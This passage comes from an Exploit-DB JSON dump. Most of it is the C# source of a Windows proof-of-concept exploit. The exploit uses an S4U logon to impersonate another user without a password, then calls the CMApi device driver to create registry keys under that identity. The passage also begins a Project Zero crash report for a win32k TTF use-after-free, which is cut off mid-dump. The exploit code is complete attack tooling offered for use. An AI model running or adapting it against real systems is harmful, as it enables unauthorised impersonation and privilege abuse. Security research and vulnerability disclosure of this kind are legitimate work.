{\r\n Dispose(false);\r\n }\r\n\r\n #region IDisposable Members\r\n\r\n public void Dispose()\r\n {\r\n Dispose(true);\r\n }\r\n\r\n #endregion\r\n }\r\n\r\n [DllImport(\"advapi32.dll\", CharSet = CharSet.Auto, SetLastError = false)]\r\n public static extern WinErrors LsaNtStatusToWinError(WinStatusCodes status);\r\n\r\n [DllImport(\"advapi32.dll\", CharSet = CharSet.Auto, SetLastError = true)]\r\n public static extern bool AllocateLocallyUniqueId([Out] out UInt64 Luid);\r\n\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Auto, SetLastError = true)]\r\n public static extern int CloseHandle(IntPtr hObject);\r\n\r\n [DllImport(\"secur32.dll\", SetLastError = false)]\r\n public static extern WinStatusCodes LsaLogonUser(\r\n [In] IntPtr LsaHandle,\r\n [In] ref LSA_STRING OriginName,\r\n [In] SecurityLogonType LogonType,\r\n [In] UInt32 AuthenticationPackage,\r\n [In] IntPtr AuthenticationInformation,\r\n [In] UInt32 AuthenticationInformationLength,\r\n [In] /*PTOKEN_GROUPS*/ IntPtr LocalGroups,\r\n [In] ref TOKEN_SOURCE SourceContext,\r\n [Out] /*PVOID*/ out IntPtr ProfileBuffer,\r\n [Out] out UInt32 ProfileBufferLength,\r\n [Out] out Int64 LogonId,\r\n [Out] out IntPtr Token,\r\n [Out] out QUOTA_LIMITS Quotas,\r\n [Out] out WinStatusCodes SubStatus\r\n );\r\n\r\n [DllImport(\"secur32.dll\", SetLastError = false)]\r\n public static extern WinStatusCodes LsaFreeReturnBuffer(\r\n [In] IntPtr buffer);\r\n\r\n [DllImport(\"secur32.dll\", SetLastError = false)]\r\n public static extern WinStatusCodes LsaConnectUntrusted([Out] out IntPtr LsaHandle);\r\n\r\n [DllImport(\"secur32.dll\", SetLastError = false)]\r\n public static extern WinStatusCodes LsaDeregisterLogonProcess([In] IntPtr LsaHandle);\r\n\r\n [DllImport(\"secur32.dll\", SetLastError = false)]\r\n public static extern WinStatusCodes LsaLookupAuthenticationPackage([In] IntPtr LsaHandle, [In] ref LSA_STRING PackageName, [Out] out UInt32 AuthenticationPackage);\r\n\r\n }\r\n\r\n public sealed class HandleSecurityToken\r\n : IDisposable\r\n {\r\n private IntPtr m_hToken = IntPtr.Zero;\r\n\r\n // using S4U logon\r\n public HandleSecurityToken(string UserName,\r\n string Domain,\r\n OSCalls.WinLogonType LogonType\r\n )\r\n {\r\n using (OSCalls.KerbS4ULogon authPackage = new OSCalls.KerbS4ULogon(UserName, Domain))\r\n {\r\n IntPtr lsaHandle;\r\n OSCalls.WinStatusCodes status = OSCalls.LsaConnectUntrusted(out lsaHandle);\r\n if (status != OSCalls.WinStatusCodes.STATUS_SUCCESS)\r\n throw new System.ComponentModel.Win32Exception((int)OSCalls.LsaNtStatusToWinError(status));\r\n try\r\n {\r\n UInt32 kerberosPackageId;\r\n using (OSCalls.LsaStringWrapper kerberosPackageName = new OSCalls.LsaStringWrapper(\"Negotiate\"))\r\n {\r\n status = OSCalls.LsaLookupAuthenticationPackage(lsaHandle, ref kerberosPackageName._string, out kerberosPackageId);\r\n if (status != OSCalls.WinStatusCodes.STATUS_SUCCESS)\r\n throw new System.ComponentModel.Win32Exception((int)OSCalls.LsaNtStatusToWinError(status));\r\n }\r\n OSCalls.LsaStringWrapper originName = null;\r\n try\r\n {\r\n originName = new OSCalls.LsaStringWrapper(\"S4U\");\r\n OSCalls.TOKEN_SOURCE sourceContext = new OSCalls.TOKEN_SOURCE(\"NtLmSsp\");\r\n System.IntPtr profileBuffer = IntPtr.Zero;\r\n UInt32 profileBufferLength = 0;\r\n Int64 logonId;\r\n OSCalls.WinStatusCodes subStatus;\r\n OSCalls.QUOTA_LIMITS quotas;\r\n status = OSCalls.LsaLogonUser(\r\n lsaHandle,\r\n ref originName._string,\r\n (OSCalls.SecurityLogonType)LogonType,\r\n kerberosPackageId,\r\n authPackage.Ptr,\r\n (uint)authPackage.Length,\r\n IntPtr.Zero,\r\n ref sourceContext,\r\n out profileBuffer,\r\n out profileBufferLength,\r\n out logonId,\r\n out m_hToken,\r\n out quotas,\r\n out subStatus);\r\n if (status != OSCalls.WinStatusCodes.STATUS_SUCCESS)\r\n throw new System.ComponentModel.Win32Exception((int)OSCalls.LsaNtStatusToWinError(status));\r\n if (profileBuffer != IntPtr.Zero)\r\n OSCalls.LsaFreeReturnBuffer(profileBuffer);\r\n }\r\n finally\r\n {\r\n if (originName != null)\r\n originName.Dispose();\r\n }\r\n }\r\n finally\r\n {\r\n OSCalls.LsaDeregisterLogonProcess(lsaHandle);\r\n }\r\n }\r\n }\r\n\r\n ~HandleSecurityToken()\r\n {\r\n Dispose(false);\r\n }\r\n\r\n public void Dispose()\r\n {\r\n Dispose(true);\r\n }\r\n\r\n private void Dispose(bool disposing)\r\n {\r\n lock (this)\r\n {\r\n if (!m_hToken.Equals(IntPtr.Zero))\r\n {\r\n OSCalls.CloseHandle(m_hToken);\r\n m_hToken = IntPtr.Zero;\r\n }\r\n if (disposing)\r\n GC.SuppressFinalize(this);\r\n }\r\n }\r\n\r\n public System.Security.Principal.WindowsIdentity BuildIdentity()\r\n {\r\n System.Security.Principal.WindowsIdentity retVal = new System.Security.Principal.WindowsIdentity(m_hToken);\r\n GC.KeepAlive(this);\r\n return retVal;\r\n }\r\n }\r\n\r\n }\r\n\r\n #endregion\r\n\r\n /// <summary>\r\n /// The Windows Logon Types.\r\n /// </summary>\r\n public enum WinLogonType\r\n {\r\n /// <summary>\r\n /// Interactive logon\r\n /// </summary>\r\n LOGON32_LOGON_INTERACTIVE = Win32.OSCalls.WinLogonType.LOGON32_LOGON_INTERACTIVE,\r\n /// <summary>\r\n /// Network logon\r\n /// </summary>\r\n LOGON32_LOGON_NETWORK = Win32.OSCalls.WinLogonType.LOGON32_LOGON_NETWORK,\r\n /// <summary>\r\n /// Batch logon\r\n /// </summary>\r\n LOGON32_LOGON_BATCH = Win32.OSCalls.WinLogonType.LOGON32_LOGON_BATCH,\r\n /// <summary>\r\n /// Logon as a service\r\n /// </summary>\r\n LOGON32_LOGON_SERVICE = Win32.OSCalls.WinLogonType.LOGON32_LOGON_SERVICE,\r\n /// <summary>\r\n /// Unlock logon\r\n /// </summary>\r\n LOGON32_LOGON_UNLOCK = Win32.OSCalls.WinLogonType.LOGON32_LOGON_UNLOCK,\r\n /// <summary>\r\n /// Preserve password logon\r\n /// </summary>\r\n LOGON32_LOGON_NETWORK_CLEARTEXT = Win32.OSCalls.WinLogonType.LOGON32_LOGON_NETWORK_CLEARTEXT,\r\n /// <summary>\r\n /// Current token for local access, credentials for network access\r\n /// </summary>\r\n LOGON32_LOGON_NEW_CREDENTIALS = Win32.OSCalls.WinLogonType.LOGON32_LOGON_NEW_CREDENTIALS\r\n }\r\n\r\n /// <summary>\r\n /// Logs in a credential for server apps. No need to provide password.\r\n /// </summary>\r\n /// <param name=\"credential\">The credential to log in. Password is ignored.</param>\r\n /// <param name=\"logonType\">The type of logon to use</param>\r\n /// <remarks>\r\n /// Requires Windows Server 2003 domain account running in Win2003 native domain mode\r\n /// </remarks>\r\n /// <returns>Returns a <c>System.Security.Principal.WindowsIdentity</c> object</returns>\r\n /// Raises an exception with error information if the user cannot log in\r\n public static System.Security.Principal.WindowsIdentity CreateIdentityS4U(System.Net.NetworkCredential credential, WinLogonType logonType)\r\n {\r\n using (Win32.HandleSecurityToken handleToken =\r\n new Win32.HandleSecurityToken(credential.UserName, credential.Domain, (Win32.OSCalls.WinLogonType)logonType))\r\n return handleToken.BuildIdentity();\r\n }\r\n\r\n\r\n class Program\r\n {\r\n [Flags]\r\n public enum AttributeFlags : uint\r\n {\r\n None = 0,\r\n Inherit = 0x00000002,\r\n Permanent = 0x00000010,\r\n Exclusive = 0x00000020,\r\n CaseInsensitive = 0x00000040,\r\n OpenIf = 0x00000080,\r\n OpenLink = 0x00000100,\r\n KernelHandle = 0x00000200,\r\n ForceAccessCheck = 0x00000400,\r\n IgnoreImpersonatedDevicemap = 0x00000800,\r\n DontReparse = 0x00001000,\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n public sealed class UnicodeString\r\n {\r\n ushort Length;\r\n ushort MaximumLength;\r\n [MarshalAs(UnmanagedType.LPWStr)]\r\n string Buffer;\r\n\r\n public UnicodeString(string str)\r\n {\r\n Length = (ushort)(str.Length * 2);\r\n MaximumLength = (ushort)((str.Length * 2) + 1);\r\n Buffer = str;\r\n }\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n public sealed class ObjectAttributes : IDisposable\r\n {\r\n int Length;\r\n IntPtr RootDirectory;\r\n IntPtr ObjectName;\r\n AttributeFlags Attributes;\r\n IntPtr SecurityDescriptor;\r\n IntPtr SecurityQualityOfService;\r\n\r\n private static IntPtr AllocStruct(object s)\r\n {\r\n int size = Marshal.SizeOf(s);\r\n IntPtr ret = Marshal.AllocHGlobal(size);\r\n Marshal.StructureToPtr(s, ret, false);\r\n return ret;\r\n }\r\n\r\n private static void FreeStruct(ref IntPtr p, Type struct_type)\r\n {\r\n Marshal.DestroyStructure(p, struct_type);\r\n Marshal.FreeHGlobal(p);\r\n p = IntPtr.Zero;\r\n }\r\n\r\n public ObjectAttributes(string object_name, AttributeFlags flags, IntPtr rootkey)\r\n {\r\n Length = Marshal.SizeOf(this);\r\n if (object_name != null)\r\n {\r\n ObjectName = AllocStruct(new UnicodeString(object_name));\r\n }\r\n Attributes = flags;\r\n RootDirectory = rootkey;\r\n }\r\n\r\n public ObjectAttributes(string object_name, AttributeFlags flags)\r\n : this(object_name, flags, IntPtr.Zero)\r\n {\r\n }\r\n\r\n public void Dispose()\r\n {\r\n if (ObjectName != IntPtr.Zero)\r\n {\r\n FreeStruct(ref ObjectName, typeof(UnicodeString));\r\n }\r\n GC.SuppressFinalize(this);\r\n }\r\n\r\n ~ObjectAttributes()\r\n {\r\n Dispose();\r\n }\r\n }\r\n\r\n [Flags]\r\n public enum LoadKeyFlags\r\n {\r\n None = 0,\r\n AppKey = 0x10,\r\n Exclusive = 0x20,\r\n Unknown800 = 0x800,\r\n ReadOnly = 0x2000,\r\n }\r\n\r\n [Flags]\r\n public enum GenericAccessRights : uint\r\n {\r\n None = 0,\r\n GenericRead = 0x80000000,\r\n GenericWrite = 0x40000000,\r\n GenericExecute = 0x20000000,\r\n GenericAll = 0x10000000,\r\n Delete = 0x00010000,\r\n ReadControl = 0x00020000,\r\n WriteDac = 0x00040000,\r\n WriteOwner = 0x00080000,\r\n Synchronize = 0x00100000,\r\n MaximumAllowed = 0x02000000,\r\n }\r\n\r\n public class NtException : ExternalException\r\n {\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n private static extern IntPtr GetModuleHandle(string modulename);\r\n\r\n [Flags]\r\n enum FormatFlags\r\n {\r\n AllocateBuffer = 0x00000100,\r\n FromHModule = 0x00000800,\r\n FromSystem = 0x00001000,\r\n IgnoreInserts = 0x00000200\r\n }\r\n\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n private static extern int FormatMessage(\r\n FormatFlags dwFlags,\r\n IntPtr lpSource,\r\n int dwMessageId,\r\n int dwLanguageId,\r\n out IntPtr lpBuffer,\r\n int nSize,\r\n IntPtr Arguments\r\n );\r\n\r\n [DllImport(\"kernel32.dll\")]\r\n private static extern IntPtr LocalFree(IntPtr p);\r\n\r\n private static string StatusToString(int status)\r\n {\r\n IntPtr buffer = IntPtr.Zero;\r\n try\r\n {\r\n if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,\r\n GetModuleHandle(\"ntdll.dll\"), status, 0, out buffer, 0, IntPtr.Zero) > 0)\r\n {\r\n return Marshal.PtrToStringUni(buffer);\r\n }\r\n }\r\n finally\r\n {\r\n if (buffer != IntPtr.Zero)\r\n {\r\n LocalFree(buffer);\r\n }\r\n }\r\n return String.Format(\"Unknown Error: 0x{0:X08}\", status);\r\n }\r\n\r\n public NtException(int status) : base(StatusToString(status))\r\n {\r\n }\r\n }\r\n\r\n public static void StatusToNtException(int status)\r\n {\r\n if (status < 0)\r\n {\r\n throw new NtException(status);\r\n }\r\n }\r\n\r\n\r\n [Flags]\r\n public enum FileOpenOptions\r\n {\r\n None = 0,\r\n DirectoryFile = 0x00000001,\r\n WriteThrough = 0x00000002,\r\n SequentialOnly = 0x00000004,\r\n NoIntermediateBuffering = 0x00000008,\r\n SynchronousIoAlert = 0x00000010,\r\n SynchronousIoNonAlert = 0x00000020,\r\n NonDirectoryFile = 0x00000040,\r\n CreateTreeConnection = 0x00000080,\r\n CompleteIfOplocked = 0x00000100,\r\n NoEaKnowledge = 0x00000200,\r\n OpenRemoteInstance = 0x00000400,\r\n RandomAccess = 0x00000800,\r\n DeleteOnClose = 0x00001000,\r\n OpenByFileId = 0x00002000,\r\n OpenForBackupIntent = 0x00004000,\r\n NoCompression = 0x00008000,\r\n OpenRequiringOplock = 0x00010000,\r\n ReserveOpfilter = 0x00100000,\r\n OpenReparsePoint = 0x00200000,\r\n OpenNoRecall = 0x00400000,\r\n OpenForFreeSpaceQuery = 0x00800000\r\n }\r\n\r\n public class IoStatusBlock\r\n {\r\n public IntPtr Pointer;\r\n public IntPtr Information;\r\n\r\n public IoStatusBlock(IntPtr pointer, IntPtr information)\r\n {\r\n Pointer = pointer;\r\n Information = information;\r\n }\r\n\r\n public IoStatusBlock()\r\n {\r\n }\r\n }\r\n\r\n [Flags]\r\n public enum ShareMode\r\n {\r\n None = 0,\r\n Read = 0x00000001,\r\n Write = 0x00000002,\r\n Delete = 0x00000004,\r\n }\r\n\r\n [Flags]\r\n public enum FileAccessRights : uint\r\n {\r\n None = 0,\r\n ReadData = 0x0001,\r\n WriteData = 0x0002,\r\n AppendData = 0x0004,\r\n ReadEa = 0x0008,\r\n WriteEa = 0x0010,\r\n Execute = 0x0020,\r\n DeleteChild = 0x0040,\r\n ReadAttributes = 0x0080,\r\n WriteAttributes = 0x0100,\r\n GenericRead = 0x80000000,\r\n GenericWrite = 0x40000000,\r\n GenericExecute = 0x20000000,\r\n GenericAll = 0x10000000,\r\n Delete = 0x00010000,\r\n ReadControl = 0x00020000,\r\n WriteDac = 0x00040000,\r\n WriteOwner = 0x00080000,\r\n Synchronize = 0x00100000,\r\n MaximumAllowed = 0x02000000,\r\n }\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtOpenFile(\r\n out IntPtr FileHandle,\r\n FileAccessRights DesiredAccess,\r\n ObjectAttributes ObjAttr,\r\n [In] [Out] IoStatusBlock IoStatusBlock,\r\n ShareMode ShareAccess,\r\n FileOpenOptions OpenOptions);\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtDeviceIoControlFile(\r\n SafeFileHandle FileHandle,\r\n IntPtr Event,\r\n IntPtr ApcRoutine,\r\n IntPtr ApcContext,\r\n [In] [Out] IoStatusBlock IoStatusBlock,\r\n uint IoControlCode,\r\n SafeHGlobalBuffer InputBuffer,\r\n int InputBufferLength,\r\n SafeHGlobalBuffer OutputBuffer,\r\n int OutputBufferLength\r\n );\r\n\r\n static T DeviceIoControl<T>(SafeFileHandle FileHandle, uint IoControlCode, object input_buffer)\r\n {\r\n using (SafeStructureOutBuffer<T> output = new SafeStructureOutBuffer<T>())\r\n {\r\n using (SafeStructureBuffer input = new SafeStructureBuffer(input_buffer))\r\n {\r\n IoStatusBlock status = new IoStatusBlock();\r\n StatusToNtException(NtDeviceIoControlFile(FileHandle, IntPtr.Zero, IntPtr.Zero,\r\n IntPtr.Zero, status, IoControlCode, input, input.Length,\r\n output, output.Length));\r\n\r\n return output.Result;\r\n }\r\n }\r\n }\r\n\r\n public static SafeFileHandle OpenFile(string name, FileAccessRights DesiredAccess, ShareMode ShareAccess, FileOpenOptions OpenOptions, bool inherit)\r\n {\r\n AttributeFlags flags = AttributeFlags.CaseInsensitive;\r\n if (inherit)\r\n flags |= AttributeFlags.Inherit;\r\n using (ObjectAttributes obja = new ObjectAttributes(name, flags))\r\n {\r\n IntPtr handle;\r\n IoStatusBlock iostatus = new IoStatusBlock();\r\n StatusToNtException(NtOpenFile(out handle, DesiredAccess, obja, iostatus, ShareAccess, OpenOptions));\r\n return new SafeFileHandle(handle, true);\r\n }\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n class CmApiOpenKeyData\r\n {\r\n public int cbSize; // 0\r\n public int device_type; // 4\r\n public int callback_id; // 8\r\n [MarshalAs(UnmanagedType.LPWStr)]\r\n public string name; // c\r\n public int name_size; // 10\r\n public GenericAccessRights desired_access; // 14\t\r\n public int create; // 18\r\n public int hardware_id; // 1c\r\n public int return_data_size; // 20\r\n\r\n public CmApiOpenKeyData(int device_type, int callback_id, string name, GenericAccessRights desired_access, bool create, int hardware_id, int return_data_size)\r\n {\r\n this.cbSize = Marshal.SizeOf(this);\r\n this.device_type = device_type;\r\n this.callback_id = callback_id;\r\n this.name = name;\r\n this.name_size = (name.Length + 1) * 2;\r\n this.desired_access = desired_access;\r\n this.create = create ? 1 : 0;\r\n this.hardware_id = hardware_id;\r\n this.return_data_size = return_data_size;\r\n }\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential)]\r\n class CmApiOpenKeyResult\r\n {\r\n int size;\r\n public int status;\r\n public long handle;\r\n };\r\n\r\n public class SafeHGlobalBuffer : SafeHandleZeroOrMinusOneIsInvalid\r\n {\r\n public SafeHGlobalBuffer(int length)\r\n : this(Marshal.AllocHGlobal(length), length, true)\r\n {\r\n }\r\n\r\n public SafeHGlobalBuffer(IntPtr buffer, int length, bool owns_handle)\r\n : base(owns_handle)\r\n {\r\n Length = length;\r\n SetHandle(buffer);\r\n }\r\n\r\n public int Length\r\n {\r\n get; private set;\r\n }\r\n\r\n protected override bool ReleaseHandle()\r\n {\r\n if (!IsInvalid)\r\n {\r\n Marshal.FreeHGlobal(handle);\r\n handle = IntPtr.Zero;\r\n }\r\n return true;\r\n }\r\n }\r\n\r\n public class SafeStructureBuffer : SafeHGlobalBuffer\r\n {\r\n Type _type;\r\n\r\n public SafeStructureBuffer(object value) : base(Marshal.SizeOf(value))\r\n {\r\n _type = value.GetType();\r\n Marshal.StructureToPtr(value, handle, false);\r\n }\r\n\r\n protected override bool ReleaseHandle()\r\n {\r\n if (!IsInvalid)\r\n {\r\n Marshal.DestroyStructure(handle, _type);\r\n }\r\n return base.ReleaseHandle();\r\n }\r\n }\r\n\r\n public class SafeStructureOutBuffer<T> : SafeHGlobalBuffer\r\n {\r\n public SafeStructureOutBuffer() : base(Marshal.SizeOf(typeof(T)))\r\n {\r\n }\r\n\r\n public T Result\r\n {\r\n get\r\n {\r\n if (IsInvalid)\r\n throw new ObjectDisposedException(\"handle\");\r\n\r\n return Marshal.PtrToStructure<T>(handle);\r\n }\r\n }\r\n }\r\n\r\n static void EnumKeys(RegistryKey rootkey, IEnumerable<string> name_parts, List<string> names, int maxdepth, int current_depth)\r\n {\r\n if (current_depth == maxdepth)\r\n {\r\n names.Add(String.Join(@\"\\\", name_parts));\r\n }\r\n else\r\n {\r\n foreach (string subkey in rootkey.GetSubKeyNames())\r\n {\r\n using (RegistryKey key = rootkey.OpenSubKey(subkey))\r\n {\r\n if (key != null)\r\n {\r\n EnumKeys(key, name_parts.Concat(new string[] { subkey }), names, maxdepth, current_depth + 1);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n\r\n static IEnumerable<string> GetValidDeviceNames()\r\n {\r\n List<string> names = new List<string>();\r\n using (RegistryKey rootkey = Registry.LocalMachine.OpenSubKey(@\"SYSTEM\\CurrentControlSet\\Enum\"))\r\n {\r\n EnumKeys(rootkey, new string[0], names, 3, 0);\r\n }\r\n return names;\r\n } \r\n\r\n static void CreateDeviceKey(string device_name, WindowsIdentity identity)\r\n {\r\n using (SafeFileHandle handle = OpenFile(@\"\\Device\\DeviceApi\\CMApi\", FileAccessRights.Synchronize | FileAccessRights.GenericRead | FileAccessRights.GenericWrite,\r\n ShareMode.None, FileOpenOptions.NonDirectoryFile | FileOpenOptions.SynchronousIoNonAlert, false))\r\n {\r\n CmApiOpenKeyData data = new CmApiOpenKeyData(0x111, 1, device_name, GenericAccessRights.MaximumAllowed, true, 0, Marshal.SizeOf(typeof(CmApiOpenKeyResult)));\r\n CmApiOpenKeyResult result = null;\r\n WindowsImpersonationContext ctx = null;\r\n if (identity != null)\r\n {\r\n ctx = identity.Impersonate();\r\n }\r\n try\r\n {\r\n result = DeviceIoControl<CmApiOpenKeyResult>(handle, 0x47085B, data);\r\n }\r\n finally\r\n {\r\n if (ctx != null)\r\n {\r\n ctx.Undo();\r\n }\r\n }\r\n\r\n StatusToNtException(result.status);\r\n }\r\n }\r\n\r\n static bool DoExploit(string username)\r\n {\r\n try\r\n {\r\n WindowsIdentity id = CCWinLogonUtilities.CreateIdentityS4U(new NetworkCredential(username, \"\", Environment.UserDomainName),\r\n CCWinLogonUtilities.WinLogonType.LOGON32_LOGON_NETWORK);\r\n bool found_hive = false;\r\n foreach (string subkey in Registry.Users.GetSubKeyNames())\r\n {\r\n string user_name = id.User.ToString();\r\n if (subkey.Equals(user_name, StringComparison.OrdinalIgnoreCase))\r\n {\r\n found_hive = true;\r\n break;\r\n }\r\n }\r\n\r\n if (!found_hive)\r\n {\r\n throw new ArgumentException(\"Couldn't find user hive, make sure the user's logged on\");\r\n }\r\n \r\n string device_name = GetValidDeviceNames().First(); \r\n Console.WriteLine(\"[SUCCESS]: Found Device: {0}\", device_name);\r\n \r\n CreateDeviceKey(device_name, id);\r\n }\r\n catch (Exception ex)\r\n {\r\n Console.WriteLine(\"[ERROR]: {0}\", ex.ToString());\r\n }\r\n\r\n return false;\r\n }\r\n\r\n static int GetSessionId()\r\n {\r\n using (Process p = Process.GetCurrentProcess())\r\n {\r\n return p.SessionId;\r\n }\r\n }\r\n\r\n static void Main(string[] args)\r\n {\r\n if (args.Length < 1)\r\n {\r\n Console.WriteLine(\"Usage: PoC username\");\r\n }\r\n else\r\n {\r\n DoExploit(args[0]);\r\n }\r\n }\r\n }\r\n }\r\n}", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40574/"}, {"lastseen": "2016-10-21T01:29:42", "description": "Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120). CVE-2016-7182. Dos exploit for Windows plat...", "published": "2016-10-20T00:00:00", "type": "exploitdb", "title": "Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7182"], "modified": "2016-10-20T00:00:00", "id": "EDB-ID:40599", "href": "https://www.exploit-db.com/exploits/40599/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=868\r\n\r\nWe have encountered Windows kernel crashes in the win32k!sbit_Embolden and win32k!ttfdCloseFontContext functions while processing corrupted TTF font files. Excerpts of them are shown below:\r\n\r\n---\r\nKERNEL_MODE_EXCEPTION_NOT_HANDLED (8e)\r\nThis is a very common bugcheck. Usually the exception address pinpoints\r\nthe driver/function that caused the problem. Always note this address\r\nas well as the link date of the driver/image that contains this address.\r\nSome common problems are exception code 0x80000003. This means a hard\r\ncoded breakpoint or assertion was hit, but this system was booted\r\n/NODEBUG. This is not supposed to happen as developers should never have\r\nhardcoded breakpoints in retail code, but ...\r\nIf this happens, make sure a debugger gets connected, and the\r\nsystem is booted /DEBUG. This will let us see why this breakpoint is\r\nhappening.\r\nArguments:\r\nArg1: c0000005, The exception code that was not handled\r\nArg2: 8e70bba3, The address that the exception occurred at\r\nArg3: 9b7e3a84, Trap Frame\r\nArg4: 00000000\r\n\r\nDebugging Details:\r\n------------------\r\n\r\n\r\nEXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.\r\n\r\nFAULTING_IP: \r\nwin32k!MultiUserGreTrackRemoveEngResource+1c\r\n8e70bba3 8901 mov dword ptr [ecx],eax\r\n\r\nTRAP_FRAME: 9b7e3a84 -- (.trap 0xffffffff9b7e3a84)\r\nErrCode = 00000002\r\neax=fa42ce68 ebx=fa42ce78 ecx=00000000 edx=00000000 esi=ff73a000 edi=fc4a4fc8\r\neip=8e70bba3 esp=9b7e3af8 ebp=9b7e3af8 iopl=0 nv up ei pl zr na pe nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246\r\nwin32k!MultiUserGreTrackRemoveEngResource+0x1c:\r\n8e70bba3 8901 mov dword ptr [ecx],eax ds:0023:00000000=????????\r\nResetting default scope\r\n\r\nDEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT\r\n\r\nBUGCHECK_STR: 0x8E\r\n\r\nPROCESS_NAME: csrss.exe\r\n\r\nCURRENT_IRQL: 2\r\n\r\nANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre\r\n\r\nLAST_CONTROL_TRANSFER: from 82933d87 to 828cf978\r\n\r\nSTACK_TEXT: \r\n9b7e303c 82933d87 00000003 1d46c818 00000065 nt!RtlpBreakWithStatusInstruction\r\n9b7e308c 82934885 00000003 9b7e3490 00000000 nt!KiBugCheckDebugBreak+0x1c\r\n9b7e3450 82933c24 0000008e c0000005 8e70bba3 nt!KeBugCheck2+0x68b\r\n9b7e3474 829092a7 0000008e c0000005 8e70bba3 nt!KeBugCheckEx+0x1e\r\n9b7e3a14 828929a6 9b7e3a30 00000000 9b7e3a84 nt!KiDispatchException+0x1ac\r\n9b7e3a7c 8289295a 9b7e3af8 8e70bba3 badb0d00 nt!CommonDispatchException+0x4a\r\n9b7e3af8 8e70bbe6 ff73a000 fb77cd28 9b7e3b20 nt!Kei386EoiHelper+0x192\r\n9b7e3b08 8e7ef63d ff73a010 8e7ef5c0 fb784cf0 win32k!EngFreeMem+0x16\r\n9b7e3b20 8e7ef67c fa42ce78 9b7e3b98 9b7e3b3c win32k!ttfdCloseFontContext+0x51\r\n9b7e3b30 8e7ef5d8 fb784cf0 9b7e3b74 8e7ef1f8 win32k!ttfdDestroyFont+0x16\r\n9b7e3b3c 8e7ef1f8 fb784cf0 fe38ccf0 9b7e3bd8 win32k!ttfdSemDestroyFont+0x18\r\n9b7e3b74 8e7ef41b fb784cf0 fe38ccf0 00000000 win32k!PDEVOBJ::DestroyFont+0x67\r\n9b7e3ba4 8e7749c3 00000000 00000000 00000001 win32k!RFONTOBJ::vDeleteRFONT+0x33\r\n9b7e3bcc 8e77660f 9b7e3bf0 fb784cf0 00000000 win32k!vRestartKillRFONTList+0x8d\r\n9b7e3c00 8e84100e 00000006 fb284fc0 8eaf8fc8 win32k!PFTOBJ::bUnloadWorkhorse+0x15f\r\n9b7e3c28 82891dc6 0500019c 002cf9cc 76e26bf4 win32k!GreRemoveFontMemResourceEx+0x60\r\n9b7e3c28 76e26bf4 0500019c 002cf9cc 76e26bf4 nt!KiSystemServicePostCall\r\n002cf9cc 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet\r\n---\r\n\r\nAnd:\r\n\r\n---\r\nPAGE_FAULT_IN_FREED_SPECIAL_POOL (cc)\r\nMemory was referenced after it was freed.\r\nThis cannot be protected by try-except.\r\nWhen possible, the guilty driver's name (Unicode string) is printed on\r\nthe bugcheck screen and saved in KiBugCheckDriver.\r\nArguments:\r\nArg1: fc1ffa54, memory referenced\r\nArg2: 00000001, value 0 = read operation, 1 = write operation\r\nArg3: 82848a05, if non-zero, the address which referenced memory.\r\nArg4: 00000000, Mm internal code.\r\n\r\nDebugging Details:\r\n------------------\r\n\r\n\r\nWRITE_ADDRESS: fc1ffa54 Special pool\r\n\r\nFAULTING_IP: \r\nnt!memset+45\r\n82848a05 f3ab rep stos dword ptr es:[edi]\r\n\r\nMM_INTERNAL_CODE: 0\r\n\r\nDEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT\r\n\r\nBUGCHECK_STR: 0xCC\r\n\r\nPROCESS_NAME: csrss.exe\r\n\r\nCURRENT_IRQL: 2\r\n\r\nANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre\r\n\r\nTRAP_FRAME: 8fb73d58 -- (.trap 0xffffffff8fb73d58)\r\nErrCode = 00000002\r\neax=00000000 ebx=00000001 ecx=00000001 edx=00000000 esi=00000004 edi=fc1ffa54\r\neip=82848a05 esp=8fb73dcc ebp=8fb73e28 iopl=0 nv up ei pl nz na po nc\r\ncs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202\r\nnt!memset+0x45:\r\n82848a05 f3ab rep stos dword ptr es:[edi]\r\nResetting default scope\r\n\r\nLAST_CONTROL_TRANSFER: from 828eed87 to 8288a978\r\n\r\nSTACK_TEXT: \r\n8fb738ac 828eed87 00000003 766f335a 00000065 nt!RtlpBreakWithStatusInstruction\r\n8fb738fc 828ef885 00000003 00000000 0000000a nt!KiBugCheckDebugBreak+0x1c\r\n8fb73cc0 8289d94d 00000050 fc1ffa54 00000001 nt!KeBugCheck2+0x68b\r\n8fb73d40 8284ffa8 00000001 fc1ffa54 00000000 nt!MmAccessFault+0x104\r\n8fb73d40 82848a05 00000001 fc1ffa54 00000000 nt!KiTrap0E+0xdc\r\n8fb73dcc 8f15cca0 fc1ffa54 00000000 00000004 nt!memset+0x45\r\n8fb73e28 8f050c00 0000000b 00000004 c0000002 